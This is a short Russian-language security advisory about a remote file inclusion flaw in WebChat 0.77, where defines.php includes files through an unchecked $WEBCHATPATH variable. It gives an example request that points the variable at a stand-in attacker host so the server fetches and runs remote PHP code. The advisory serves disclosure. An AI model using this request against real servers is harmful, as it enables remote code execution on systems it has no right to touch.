Уязвимость включения файла обнаружена в WebChat. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевом сервере.

Сценарий defines.php включает файлы db_mysql.php и
language/eng lish.php через переменную $WEBCHATPATH, но не проверяет правильность местоположения файла перед его включением. Удаленный пользователь может определить удаленное местоположение этих файлов, заставляя целевой сервер включить и выполнить дистанционно расположенные файлы. Пример: 

http://[target]/defines.php?WEBCHATPATH=http://[attacker]/

где

http://[attacker]/language/english.php или http://[attacker]/language/db_mysql.php

Уязвимость обнаружена в WebChat 0.77.



Оставить мнение